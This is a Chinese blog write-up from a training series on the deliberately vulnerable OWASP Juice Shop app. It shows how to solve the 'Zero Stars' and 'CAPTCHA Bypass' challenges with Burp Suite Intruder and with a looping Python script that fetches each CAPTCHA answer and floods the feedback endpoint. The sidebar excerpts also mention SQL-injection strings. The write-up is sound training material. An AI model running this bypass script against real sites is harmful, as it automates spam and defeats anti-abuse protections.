OWASP Juice Shop 学习 三

已于 2022-04-30 20:54:06 修改
阅读量1.5k 收藏 3
点赞数 2
分类专栏: 安全 文章标签: web安全
于 2022-04-17 20:49:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43838889/article/details/124234813
版权

OWASP Juice Shop 学习 三

解锁 Zero Stars ★ 和 CAPTCHA Bypass ★★★

在这里插入图片描述
打开侧边菜单 - > Customer Feedback,显示用户反馈页面表单。
在这里插入图片描述
打开Burp Suite Professional ,点击 Proxy -> Intercept -> Open Browser,打开内置浏览器。
在这里插入图片描述
在内置浏览器打开 http://192.168.31.203/#/contact ,Burp会截取每个浏览器会话请求,这时 Forward 按钮可用,不断点击Forward按钮,允许所有请求,内置浏览器将正常显示用户反馈页面表单。
在这里插入图片描述
在内置浏览器,填写用户反馈页面表单,点击Submit,在Burp 上 Forward 按钮一阵狂点。
在这里插入图片描述
在Burp 点击 HTTP hisotry ,我们可以看到Burp记录一次完整的页面交互过程。
查看后发现第55条记录,浏览器 调用/api/Feedbacks 接口,使用POST 方法提交填写的用户反馈数据。
在这里插入图片描述
POST的数据:{“captchaId”:16,“captcha”:“196”,“comment”:“dislike (anonymous)”,“rating”:2},我们可以伪造部分数据,看看服务端的反应。

点击Actions 按钮,再点击 Send to Intruder。
在这里插入图片描述
点击 Intruder -> Positions ,我们会发现 Playload Positions是 POST /api/Feedbacks接口,Burp自动用 § 符号(绿色),将所有的变量包含起来。在这里插入图片描述
我们先伪造 “rating” 的值,点击 Clear § 按钮,将所有变量位置清除掉。
在这里插入图片描述
然后在“rating":2 上选中2(不知道为什么选中时会向左偏移几位),点击 Add § 按钮,确保2被§符号包括起来,如:“rating":§2§。
在这里插入图片描述
点击Payloads - > Payload type 选中Numbers
在这里插入图片描述
选择连续值,从0到10,步进1。点击 Start attack 按钮,进行攻击。
在这里插入图片描述
Burp 会模拟之前的POST /api/Feedbacks 包,将”rating": 值进行0-10的遍历。
在这里插入图片描述
这样就解锁 Zero Stars ★ 和 CAPTCHA Bypass ★★★
在这里插入图片描述
在这里插入图片描述

从用户反馈页面交互分析,主要流程:

  1. GET /rest/captcha/ 接口,获取 验证码。
  2. POST /api/Feedbacks/ 接口,携带验证码提交反馈信息。

在这里插入图片描述
下面的Python脚本模拟这两个接口的调用,

import requests,json,time,random

headers = {'Host': '192.168.31.203','Content-Length': '89','Accept': 'application/json, text/plain, */*','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36','Content-Type': 'application/json','Origin': 'http://192.168.31.203','Referer': 'http://192.168.31.203/','Accept-Encoding': 'gzip, deflate','Accept-Language': 'zh-CN,zh;q=0.9','Cookie': 'language=en; cookieconsent_status=dismiss','Connection': 'close'}

captcha_url = "http://192.168.31.203/rest/captcha/"
Feedbacks_url = "http://192.168.31.203/api/Feedbacks/"

while 1:
    print("---",time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
    req = json.loads(requests.get(captcha_url).text)
    #print(req['captchaId'],req['answer'])
    rating = random.randint(0, 10)
    datas = json.dumps({'captchaId':req['captchaId'],'captcha':req['answer'],'comment':'1111111111111111111111111111111 (anonymous)','rating':rating})
    byte_data = datas.encode('utf-8')
    #print(datas)
    req = requests.post(Feedbacks_url, data = byte_data, headers = headers)
    print(req.text)

脚本运行如下:

>python captcha.py
--- 2022-04-17 23:50:48
{"status":"success","data":{"id":381,"comment":"1111111111111111111111111111111 (hangzhou)","rating":5,"updatedAt":"2022-04-17T15:50:43.597Z","createdAt":"2022-04-17T15:50:43.597Z","UserId":null}}
--- 2022-04-17 23:50:48
{"status":"success","data":{"id":382,"comment":"1111111111111111111111111111111 (hangzhou)","rating":6,"updatedAt":"2022-04-17T15:50:43.702Z","createdAt":"2022-04-17T15:50:43.702Z","UserId":null}}
--- 2022-04-17 23:50:48
{"status":"success","data":{"id":383,"comment":"1111111111111111111111111111111 (hangzhou)","rating":2,"updatedAt":"2022-04-17T15:50:43.823Z","createdAt":"2022-04-17T15:50:43.823Z","UserId":null}}
--- 2022-04-17 23:50:48
{"status":"success","data":{"id":384,"comment":"1111111111111111111111111111111 (hangzhou)","rating":9,"updatedAt":"2022-04-17T15:50:43.889Z","createdAt":"2022-04-17T15:50:43.889Z","UserId":null}}

ASP Juice Shop 学习 二 主动侦察 1

OWASP Juice Shop 学习 二 主动侦察 2

OWASP Juice Shop 学习 二 主动侦察 2

OWASP Juice Shop 学习 三

OWASP Juice Shop 学习 四

OWASP Juice Shop 学习 五

OWASP Juice Shop 学习 六

OWASP Juice Shop 学习 七

OWASP Juice Shop 学习 八

OWASP Juice Shop 学习 九

OWASP Juice Shop 学习 十

医生的托马斯
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Owasp juice shop部分通关教程
锋刃科技的博客
04-28 2045
我们为了方便行事,所以我们直接用docker来安装 docker pull bkimminich/juice-shop 启动docker run -d -p 80:3000 bkimminich/juice-shop 然后就是自己的ip即可查看 我们在右上角选择中文来让页面更友好一些 首先,查看首页源码发现<a href=”#/score-board”>S...
OWASP juice shop笔记(一)
x1t02m的博客
09-01 2380
1.前言 同学向我推荐了一个靶场,OWASP juice shop,试了一下觉得很新颖,在此将学习过程形成笔记。该漏洞靶场由OWASP开发,包含了OWASP的十大漏洞,共计47关。我们从搭建靶场开始。 2.环境搭建 使用docker来安装比较方便,我是直接安装在Ubuntu(18.04.1)系统的 2.1安装docker $sudo apt-get update $sud...
OWASP Juice Shop 学习 一 安装实验环境
weixin_43838889的博客
04-17 1730
OWASP Juice Shop,是 Björn Kimminich 创建的 OWASP 旗舰项目。 它旨在包含来自 OWASP Top 10 和 OWASP API Security Top 10 的漏洞。Juice Shop 中发现的一个很棒的功能是它可以跟踪您的黑客进度并包含一个隐藏的记分牌。 Juice Shop 是使用 Node.js、Express 和 Angular 构建的。 它是一个由 REST API 提供支持的 JavaScript 应用程序。 OWASP Juice Shop 学习一安
推荐:OWASP Juice Shop——网络安全的游乐场
最新发布
gitblog_00043的博客
05-11 395
推荐:OWASP Juice Shop——网络安全的游乐场 项目地址:https://gitcode.com/juice-shop/juice-shop 1、项目介绍 OWASP Juice Shop 是一个值得信赖的安全漏洞演示应用,它以现代和复杂的方式呈现了网络安全的各种威胁。这个项目由OWASP(开放式网络应用程序安全项目)官方支持,旨在为安全培训、意识演示、CTF比赛以及安全工具测试提供一...
Owasp juice shop(一)
weixin_44300286的博客
09-10 3390
0x01 前言 最近玩了一下Owasp juice shop,觉得挺有意思的,Owasp juice shop是一个有着很多漏洞靶场,一共有47关,难度各有不同,可以满足一下菜鸟的黑客梦想。 0x02 靶场搭建 Juice shop是个开源项目,源码可在github上获取(https://github.com/bkimminich/juice-shop),最为方便的还是使用docker来安装。我用...
OWASP安全练习靶场juice shop-更新中
seanyang_的博客
12-05 3035
Juice Shop是用Node.js,Express和Angular编写的。这是第一个 完全用 JavaScript 编写的应用程序,列在。该应用程序包含大量不同的黑客挑战 用户应该利用底层的困难 漏洞。黑客攻击进度在记分板上跟踪。找到这个记分牌实际上是(简单的)挑战之一!除了黑客和意识培训用例外,渗透测试 代理或安全扫描程序可以将 Juice Shop 用作“几内亚” pig“-应用程序来检查他们的工具如何应对 JavaScript 密集型应用程序前端和 REST API。部署。
OWASP Juice Shop 学习
weixin_43838889的博客
04-19 410
OWASP Juice Shop 学习 六解锁 Upload Type (Upload a file that has no .pdf or .zip extension.) 解锁 Upload Type (Upload a file that has no .pdf or .zip extension.) 使用 OWASP Juice Shop 学习 五 的方法,用Burn Suit 登陆admin用户。访问 投诉页面,随便上传一个pdf文件。 查看Burp Suit抓包,找到 /file-uploa
OWASP Juice Shop:可能是最现代和最复杂的不安全 Web 应用程序-开源
07-02
OWASP Juice Shop 可能是最现代和最先进的不安全网络应用程序! 它可用于安全培训、意识演示、CTF 以及作为安全工具的试验品! Juice Shop 包含来自整个 OWASP 前十名的漏洞以及在实际应用程序中发现的许多其他安全...
juice-shop-ctf:OWASP Juice Shop的标志捕获(CTF)环境设置工具
04-30
OWASP果汁商店CTF扩展 Node包可以帮助您准备针对不同流行CTF框架的挑战的事件。 此交互式实用程序使您可以在几分钟内填充CTF游戏服务器。 支持的CTF框架 juice-shop-ctf-cli支持以下开源CTF框架: 特遣部队 ...
JuiceShopSecurityTests:OWASP Juice Shop的一组安全单元和集成测试
05-16
所有示例都使用Mocha( )运行和定位OWASP Juice Shop( )应用程序7.10。 Juice Shop倾向于在新版本中添加请求参数或在代码中四处移动变量,这破坏了一些单元测试。 Juice Shop github页面上提供了几种安装Juice ...
juiceshoproutes:简单的Burp插件可在OWASP Juice Shop App中识别路线
05-15
简单的Burp插件可在OWASP Juice Shop App中识别路线 该项目只是一个示例,展示了如何创建简单的burp扩展名以帮助识别特定信息。 在这种情况下,该工具可与将RouteProvider公开给客户端的Angular应用程序一起使用。 ...
OWASP Mutillidae II 漏洞靶场实验指导书.pdf
11-20
OWASP Mutillidae II 漏洞靶场实验指导书汇总 OWASP Top 10 应用安全风险-2017 OWASP (Open Web Application Security Project)开放式 Web 应用程序 安全项目,是一个组织,它提供有关计算机和互联网应用程序的公正、实际、有 成本效益的信息。其目的是协助个人、企业和机构来发现和使用可信赖软件。
juice-shop
03-30
OWASP Juice Shop可能是最现代,最复杂的不安全Web应用程序! 它可以用于安全培训,意识演示,CTF和用作安全工具的豚鼠! Juice Shop涵盖了整个漏洞,以及在实际应用中发现的许多其他安全漏洞! 有关详细介绍,...
Web 漏洞训练平台学习笔记(webgoat & juice shop
weixin_51194266的博客
05-11 1029
WebGoat学习笔记 实验目的 了解常见 Web 漏洞训练平台; 了解 常见 Web 漏洞的基本原理; 掌握 OWASP Top 10 及常见 Web 高危漏洞的漏洞检测、漏洞利用和漏洞修复方法; 实验环境 WebGoat kali 2021.2 实验要求 每个实验环境完成不少于 5 种不同漏洞类型的漏洞利用练习 (可选)使用不同于官方教程中的漏洞利用方法完成目标漏洞利用练习 (可选)最大化 漏洞利用效果实验 (可选)定位缺陷代码 (可选)尝试从源代码层面修复漏洞 WebGoat环境
OWASP Juice Shop 一星难度 writeup
安全不止
04-20 2150
近日在OWASP官网发现了这个靶场,融入了OWASP TOP10的漏洞,感觉好像很好玩,花了好几天的时间自己快速地过了一遍。整理一哈wp发出来 环境搭建 官方的Github源码链接为 https://github.com/bkimminich/juice-shop/ 源码NPM安装 注意 Node8 和 Node9 有所不同,具体可见github的安装指南。以下是9的安装步骤 安装...
OWASP Juice Shop 实战报告与解析
多崎巡礼的博客
11-01 3259
OWASP Juice Shop 实战报告与解析安装教程1.1 Admin Section1.2 confidential document1.3 Error Handing(错误的登录框)1.7 XSS Tier 12.5 安装教程 按照github项目的流程 结果18.04ubuntu 在第四部编译一直报错 npm ERR! fetch failed https://registry.npmj...
Owasp juice shop 部分通关教程(
锋刃科技的博客
04-30 1071
伪造的优惠券 在ftp上用截断把coupons_2013.md.bak下载下来查看,这是优惠卷来的 这个优惠券前面是2013年的,也就是对应了JAN13。后面是打几折,今天是2020年想打八折那么就是APR20-80试试看。 进行加密后放在添加优惠卷中,然后下单即可 圣诞节特别 我们在搜索中放在单引号然后抓包,改成’))--即可爆出所有商品 加入购物车购买即...
OWASP Juice Shop 学习
weixin_43838889的博客
04-18 2893
OWASP Juice Shop 学习 五解锁 Login Admin (Log in with the administrator's user account.) 解锁 Login Admin (Log in with the administrator’s user account.) 浏览器F12 打开开发者工具,访问 http://192.168.31.203/#/login,邮件地址填 '1 ,密码随便填,点登陆。出现异常页面。 从 http://192.168.31.203/rest/use
第一章:mysql配置主从复制
Xeon_CC的博客
07-04 656
1.最小白安装linux版的mysql5.7 准备主机:192.168.31.202 从机:192.168.31.203 cd /usr/local/ wget -i -c http://dev.mysql.com/get/mysql57-community-release-el7-10.noarch.rpm yum -y install mysql57-community-release-el7-10.noarch.rpm yum -y install mysql-community-se.
docker 安装owasp
09-19
要安装OWASP Juice Shop容器,您可以按照以下步骤进行操作: 1. 首先,确保您已经安装了Docker。如果还没有安装,请参考您操作系统的文档或官方网站来安装Docker。 2. 启动Docker并验证安装是否成功。 3. 在终端中运行以下命令来拉取OWASP Juice Shop容器: ``` docker pull bkimminich/juice-shop ``` 4. 等待镜像下载完成后,可以运行以下命令来启动OWASP Juice Shop容器: ``` docker run -d -p 3000:3000 bkimminich/juice-shop ``` 这将在后台启动一个容器,并将主机的3000端口映射到容器的3000端口。 5. 现在,您可以通过访问http://localhost:3000来访问OWASP Juice Shop。 希望这可以帮助您安装OWASP Juice Shop容器。如果您有任何其他问题,请随时问我。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值